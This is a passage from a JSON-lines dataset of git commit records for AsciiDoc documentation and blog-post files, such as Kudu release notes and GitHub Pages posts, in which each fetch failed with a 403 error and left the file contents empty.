Jenkins\n","repos":"andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7769b240a4a6a2bb59051aa6796a0420791ca24a","subject":"Update 2016-01-06-Playing-with-CSS3-Filters.adoc","message":"Update 2016-01-06-Playing-with-CSS3-Filters.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2016-01-06-Playing-with-CSS3-Filters.adoc","new_file":"_posts\/2016-01-06-Playing-with-CSS3-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"618a3f898e1d97245739e09350bd4d4f2ea8f597","subject":"Update 2017-04-03-Reflexive-Stormechanismen.adoc","message":"Update 2017-04-03-Reflexive-Stormechanismen.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-04-03-Reflexive-Stormechanismen.adoc","new_file":"_posts\/2017-04-03-Reflexive-Stormechanismen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f6bfd77fb408b7daa4fb231073fe99ed7a5c5e3","subject":"y2b create post Apple Watch - Will It Scratch?","message":"y2b create post Apple Watch - Will It Scratch?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-04-21-Apple-Watch--Will-It-Scratch.adoc","new_file":"_posts\/2015-04-21-Apple-Watch--Will-It-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30d963c2744471b23a93c9bb53a682a57631db9d","subject":"Update 2015-05-18-uGUI.adoc","message":"Update 2015-05-18-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-18-uGUI.adoc","new_file":"_posts\/2015-05-18-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4d5452ed4313b1a00c295ae9d373e1f65116fbd","subject":"Update 2018-07-26-Scratch.adoc","message":"Update 2018-07-26-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-26-Scratch.adoc","new_file":"_posts\/2018-07-26-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"888fee58c29b34c0c2cd150b365406e6d0756975","subject":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","message":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a5e377e8cf7cd97f1ed58c91a58b420e2deee3b","subject":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","message":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"994762e7ec777364eada9fd6b785f21facf4f568","subject":"Update 2015-09-10-st-pierre.adoc","message":"Update 2015-09-10-st-pierre.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-10-st-pierre.adoc","new_file":"_posts\/2015-09-10-st-pierre.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3aedd3be841351e717c17a2cfe5c6c863108eb04","subject":"Add type conversion functions CIP","message":"Add type conversion functions CIP\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2016-07-07-Type-conversion-functions.adoc","new_file":"cip\/CIP2016-07-07-Type-conversion-functions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"05d41b9bd95703b5e043aa074f61ec6a6108cf02","subject":"Update 
2017-07-09-Backup-Google-Cloud-Spanner-database-to-PostgreSQL.adoc","message":"Update 2017-07-09-Backup-Google-Cloud-Spanner-database-to-PostgreSQL.adoc","repos":"olavloite\/olavloite.github.io,olavloite\/olavloite.github.io,olavloite\/olavloite.github.io,olavloite\/olavloite.github.io","old_file":"_posts\/2017-07-09-Backup-Google-Cloud-Spanner-database-to-PostgreSQL.adoc","new_file":"_posts\/2017-07-09-Backup-Google-Cloud-Spanner-database-to-PostgreSQL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/olavloite\/olavloite.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ea066fe20570482b43355f71ccb2b8079df4f00","subject":"create post The Best Wireless Headphones You Can Buy Right Now","message":"create post The Best Wireless Headphones You Can Buy Right Now","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-The-Best-Wireless-Headphones-You-Can-Buy-Right-Now.adoc","new_file":"_posts\/2018-02-26-The-Best-Wireless-Headphones-You-Can-Buy-Right-Now.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce0eb6d58b68a7da25a0ae56ae69ac9993be8e47","subject":"auth.path instead of auth.pass and grammar","message":"auth.path instead of auth.pass and grammar\n","repos":"girirajsharma\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yonglehou\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68fab4fe5a889bc8583da5199f09ae43e9dbefae","subject":"y2b create post Crazy iPhone Knife Case!","message":"y2b create post Crazy iPhone Knife Case!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-07-30-Crazy-iPhone-Knife-Case.adoc","new_file":"_posts\/2014-07-30-Crazy-iPhone-Knife-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32dc70de9937509e9b23cc70d7508d6deca963a7","subject":"y2b create post 3 Cool Gadgets Under $10","message":"y2b create post 3 Cool Gadgets Under $10","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-09-3-Cool-Gadgets-Under-10.adoc","new_file":"_posts\/2017-04-09-3-Cool-Gadgets-Under-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned 
error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04a39651ec21e6eb5083d359efbc30fdc8affe21","subject":"Update 2017-10-13-making-L-A-M-P-by-A-W-S.adoc","message":"Update 2017-10-13-making-L-A-M-P-by-A-W-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-13-making-L-A-M-P-by-A-W-S.adoc","new_file":"_posts\/2017-10-13-making-L-A-M-P-by-A-W-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f850c93bd7ce8a0ef781ca89fae962b1e06e3815","subject":"Update 2015-06-25-Die-neue-Beta.adoc","message":"Update 2015-06-25-Die-neue-Beta.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_file":"_posts\/2015-06-25-Die-neue-Beta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39ef8d3281a7507c523c4b37bfabbd929ecb8dfc","subject":"Add badge to readme file that shows the docker image size, # of layers and the latest released version (#144)","message":"Add badge to readme file that shows the docker image size, # of layers and the latest released version (#144)\n\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"docker-dist\/README.adoc","new_file":"docker-dist\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6bc5da898a9aa53a6bd788f9c089feaf0ae024f","subject":"\u52a0\u85e4 \u6295\u7a3f\u30d5\u30a1\u30a4\u30eb\u8ffd\u52a0","message":"\u52a0\u85e4 \u6295\u7a3f\u30d5\u30a1\u30a4\u30eb\u8ffd\u52a0\n","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-15-Kato-Google-App-Script.adoc","new_file":"_posts\/2016-04-15-Kato-Google-App-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a660d4f9061db80742ed19894358a3373584604","subject":"Update 2018-03-14-golanggolangphperphper.adoc","message":"Update 2018-03-14-golanggolangphperphper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-14-golanggolangphperphper.adoc","new_file":"_posts\/2018-03-14-golanggolangphperphper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b3fa8081ad1bc9311c9c2e8ac7e112a532cfef8","subject":"Add letsencrypt README","message":"Add 
letsencrypt README\n","repos":"10sr\/server-provisions,10sr\/machine-setups,10sr\/machine-setups,10sr\/machine-setups,10sr\/server-provisions,10sr\/machine-setups","old_file":"conoha\/roles\/letsencrypt\/README.adoc","new_file":"conoha\/roles\/letsencrypt\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/10sr\/machine-setups.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"5c673ecad0ec5d27ba21678576cac95c1e6da948","subject":"Update 2016-03-31-Fastlane-i-O-S-development-and-deployment-make-easy.adoc","message":"Update 2016-03-31-Fastlane-i-O-S-development-and-deployment-make-easy.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-Fastlane-i-O-S-development-and-deployment-make-easy.adoc","new_file":"_posts\/2016-03-31-Fastlane-i-O-S-development-and-deployment-make-easy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f99cb16c6bfeecc005c0ef159ccbcbdfb13d3008","subject":"Update 2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","message":"Update 2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_file":"_posts\/2015-06-22-asciidoc-create-and-publish-everywhere-from-anywhere.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bc29e98aba665a21afa11d4c32d8ac11ebc972a","subject":"Update 2017-07-28-.adoc","message":"Update 2017-07-28-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-.adoc","new_file":"_posts\/2017-07-28-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7526cbccd7cd86a33c597273b63804c3e5853bb4","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5cac0009ac5a3182ec787c5e57b2592ad9842a1","subject":"Small updt proc Ex","message":"Small updt proc Ex\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"L3\/Exercices not\u00e9s.adoc","new_file":"L3\/Exercices not\u00e9s.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c448a153862759840483b02b4871537d957651cd","subject":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","message":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5518997e60ca1b7faf25758b40d4481f560f7184","subject":"chore(about-author): Twitter\u3078\u306e\u30ea\u30f3\u30af\u3092\u8ffd\u52a0","message":"chore(about-author): Twitter\u3078\u306e\u30ea\u30f3\u30af\u3092\u8ffd\u52a0\n","repos":"wangwei1237\/promises-book,oToUC\/promises-book,liyunsheng\/promises-book,azu\/promises-book,charlenopires\/promises-book,wenber\/promises-book,sunfurong\/promise,cqricky\/promises-book,liubin\/promises-book,liyunsheng\/promises-book,mzbac\/promises-book,purepennons\/promises-book,sunfurong\/promise,wangwei1237\/promises-book,cqricky\/promises-book,charlenopires\/promises-book,liubin\/promises-book,xifeiwu\/promises-book,charlenopires\/promises-book,tangjinzhou\/promises-book,lidasong2014\/promises-book,oToUC\/promises-book,genie88\/promises-book,cqricky\/promises-book,xifeiwu\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,oToUC\/promises-book,mzbac\/promises-book,genie88\/promises-book,dieface\/promises-book,wenber\/promises-book,dieface\/promises-book,azu\/promises-book,genie88\/promises-book,dieface\/promises-book,purepennons\/promises-book,xifeiwu\/promises-book,tangjinzhou\/promises-book,lidasong2014\/promises-book,wangwei1237\/promises-book,liubin\/promises-book,tangjinzhou\/promises-book,wenber\/promises-book,azu\/promises-book,sunfurong\/promise,liyunsheng\/promises-book,azu\/promises-book,purepennons\/promises-book","old_file":"Appendix-Glossary\/about-author.adoc","new_file":"Appendix-Glossary\/about-author.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9dfc0413654873b5b5c5ecdfca38ebdc5b081167","subject":"Update 2016-03-31-Fastlane-i-O-S-development-and-deployment-make-easy.adoc","message":"Update 2016-03-31-Fastlane-i-O-S-development-and-deployment-make-easy.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-Fastlane-i-O-S-development-and-deployment-make-easy.adoc","new_file":"_posts\/2016-03-31-Fastlane-i-O-S-development-and-deployment-make-easy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce7c9c36bb11995bcc0fa067f6416e6bf7d3d0ec","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 
2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0204982754fc005c84526797c34f4685c0f23f5","subject":"y2b create post Holiday Gift Guide 2011","message":"y2b create post Holiday Gift Guide 2011","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-05-Holiday-Gift-Guide-2011.adoc","new_file":"_posts\/2011-12-05-Holiday-Gift-Guide-2011.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0231837de4bccc5255d341d56b3e2a432dd51052","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fc18324111f2f842204f9cfe56a5d4241b39c2d","subject":"Update 2016-03-02-liste-questions-finance.adoc","message":"Update 2016-03-02-liste-questions-finance.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-03-02-liste-questions-finance.adoc","new_file":"_posts\/2016-03-02-liste-questions-finance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cfae637fbdfc95553defa6f8e007bd43a73603f","subject":"Renamed '_posts\/2018-03-25-Whats-up-Flutter-March-2018.adoc' to '_posts\/2018-03-30-Whats-up-Flutter-March-2018.adoc'","message":"Renamed '_posts\/2018-03-25-Whats-up-Flutter-March-2018.adoc' to '_posts\/2018-03-30-Whats-up-Flutter-March-2018.adoc'","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2018-03-30-Whats-up-Flutter-March-2018.adoc","new_file":"_posts\/2018-03-30-Whats-up-Flutter-March-2018.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5444eb7ff889055a124a0c62f750385a59f2fe71","subject":"Update 2016-02-10-Software-architect-is-like-a-captain-of-football-team.adoc","message":"Update 
2016-02-10-Software-architect-is-like-a-captain-of-football-team.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-02-10-Software-architect-is-like-a-captain-of-football-team.adoc","new_file":"_posts\/2016-02-10-Software-architect-is-like-a-captain-of-football-team.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"388ac1b238b523cab2306ef5293ea5fb8cdd8bc8","subject":"y2b create post These Crazy Sunglasses Do Something Incredible (Seriously)","message":"y2b create post These Crazy Sunglasses Do Something Incredible (Seriously)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-01-These-Crazy-Sunglasses-Do-Something-Incredible-Seriously.adoc","new_file":"_posts\/2017-07-01-These-Crazy-Sunglasses-Do-Something-Incredible-Seriously.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88b459dc9336e78365ccdbba55d8343eed5ec3d6","subject":"Update 2017-07-28-.adoc","message":"Update 2017-07-28-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-.adoc","new_file":"_posts\/2017-07-28-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a585a7335a560d2867e447fea7e193e2735f4194","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddba74251bc8c942cfeacb2cdd0cc3968fe2c652","subject":"Add tutorial to README","message":"Add tutorial to README\n","repos":"juxt\/edge,juxt\/edge","old_file":"tutorial.moan\/README.adoc","new_file":"tutorial.moan\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juxt\/edge.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb2f731dee88c8db40098fc6acbea7efc9e54364","subject":"Update 2015-07-07-Entri-Pertama-or-07-Julai-2015.adoc","message":"Update 2015-07-07-Entri-Pertama-or-07-Julai-2015.adoc","repos":"hotfloppy\/hotfloppy.github.io,hotfloppy\/hotfloppy.github.io,hotfloppy\/hotfloppy.github.io","old_file":"_posts\/2015-07-07-Entri-Pertama-or-07-Julai-2015.adoc","new_file":"_posts\/2015-07-07-Entri-Pertama-or-07-Julai-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/hotfloppy\/hotfloppy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ab68677dfaf4eb6e860d57f9d1c5242e4ef3c60","subject":"create post 3 Unique Gadgets You Wouldn't Expect To Exist","message":"create post 3 Unique Gadgets You Wouldn't Expect To Exist","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_file":"_posts\/3-Unique-Gadgets-You-Wouldn't-Expect-To-Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"809154017ef2edfd8260ba250a9893e815479d97","subject":"Fix docker run command for cassandra","message":"Fix docker run command for cassandra\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"docker-dist\/README.adoc","new_file":"docker-dist\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fd2c9ab89d28d543a76ca234a405eed8a656b613","subject":"Worked on BSM support","message":"Worked on BSM support\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/BSM event auditing file format.asciidoc","new_file":"documentation\/BSM event auditing file format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"534a1577833e23728e07f6c5092822f118e64708","subject":"Update 2015-07-21-Whats-the-use-of-Monads.adoc","message":"Update 